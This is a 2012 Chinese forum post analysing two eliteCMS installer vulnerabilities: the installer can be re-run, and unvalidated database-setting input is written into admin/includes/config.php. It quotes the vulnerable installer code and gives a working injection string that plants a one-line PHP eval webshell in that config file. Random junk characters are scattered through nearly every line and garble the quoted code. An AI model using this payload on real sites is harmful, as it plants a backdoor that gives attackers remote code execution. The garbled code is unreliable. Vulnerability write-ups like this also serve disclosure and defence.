eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
) I) s9 I: x9 p
% }, s" I8 w( B9 R& X6 U, x另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php+ g/ M g. d" S9 }
我们来看代码:. k; u. Y8 E7 }, U
! G! U) C: h2 E% ^2 x/ p
... z/ I" b7 E) U7 {3 L9 S X& L6 I
elseif ($_GET['step'] == "4") {" K3 Z; Y) P4 S. F
$file = "../admin/includes/config.php";$ N5 L) |4 s! c8 {! Z
$write = "<?php\n";
; a3 @8 v, T5 W0 g3 j2 a" l $write .= "/**\n";
% {4 B5 B; i/ g: E $write .= "*\n";
+ e8 p @# B5 L& @+ S $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
0 M( j# X3 C) s% _5 r...略...* `1 d9 s3 c- Z4 s# N" U
$write .= "*\n";
( |7 |+ c" r0 i2 Q( [ $write .= "*/\n";" R1 E$ P# [+ M2 X
$write .= "\n";
# m0 T/ D. }" M3 w4 C $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
5 @7 h3 h/ k8 }# o, `2 ~ $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";' M/ @4 p; T6 j7 Z3 Q, g( F
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
" }) S7 O& h8 b$ e3 ^1 k $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
- I+ y! v n( F$ s0 z+ y5 D3 ^ $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
% Y6 M+ q* ^8 H' j; X! O( q $write .= "if (!\$connection) {\n";
* D" \4 W# e! a# K $write .= " die(\"Database connection failed\" .mysql_error());\n";
8 O8 O/ N5 O2 F- w6 r8 D $write .= " \n";8 ]9 b! |6 o% W/ m5 }1 [$ m. j3 Q" g9 W
$write .= "} \n";$ N2 V/ @) |7 C5 |$ ^
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
2 k, |- d, p, J& s0 ~" P $write .= "if (!\$db_select) {\n";
6 t! ~: W& q) z $write .= " die(\"Database select failed\" .mysql_error());\n";
8 H: U' d4 A; j/ g, G $write .= " \n";1 B6 U* w8 Z+ N/ L
$write .= "} \n";
0 V$ w( @. P- |5 |& ]9 S1 K' H( W; H $write .= "?>\n";
, P9 H& z) m1 B" Q* ?: [
9 O9 _, X# u H7 b# _/ b $writer = fopen($file, 'w');
( _6 W0 p3 `0 P p* _) d2 {/ g...8 J6 w: Z" p/ _4 \
% Y) c$ F$ R! c: [+ n8 d7 `9 O) l在看代码:2 b# ^* J: D) g z$ m: q
+ Q4 n% G0 |1 S+ S. d1 z$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];1 \" Q; w H! ^! M
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];' ? R, b3 t" e( a
$_SESSION['DB_USER'] = $_POST['DB_USER'];6 {& b( D; B( ^5 D+ W# q
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];8 G; ]1 A9 {; C- P& O" ^- i
+ K3 U$ Z. b3 S, P0 H" C取值未作任何验证: k2 J2 v1 ?7 n/ t& @ `
如果将数据库名POST数据:
, J( o% I( d9 U5 I0 N
; K: u1 C( S1 a: f"?><?php eval($_POST[c]);?><?php
+ {. D( t, G" a Y 6 j* I1 d2 N: W' \5 Y/ {
将导致一句话后门写入/admin/includes/config.php. p2 I! s, K2 C* B" F/ E
|
发表于 2012-11-18 13:59:27
收藏
支持
反对